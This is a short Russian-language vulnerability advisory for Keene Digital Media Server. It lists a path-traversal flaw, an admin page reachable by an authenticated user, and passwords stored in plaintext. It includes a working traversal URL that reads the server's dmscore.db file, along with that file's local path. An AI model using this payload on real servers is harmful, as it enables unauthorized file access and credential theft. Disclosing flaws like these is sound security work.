Программа: Keene Digital Media Server
Несколько уязвимостей обнаружено в Keene Digital Media Server. Удаленный пользователь может просматривать файлы на целевой системе. Удаленный авторизованный пользователь может выполнять административные задачи. Локальный пользователь может просматривать пароли.
1. Просмотр произвольных файлов:
http://127.0.0.1:8080/dms/%2e%2e/ %2e%2e/dmscore.db
2. Выполнение административных функций:
http://127.0.0.1:8080/dms/adminusers.kspx
2. Пароли в открытом виде:
\Program Files\Keene Software\Digital Media Server\dmscore.db
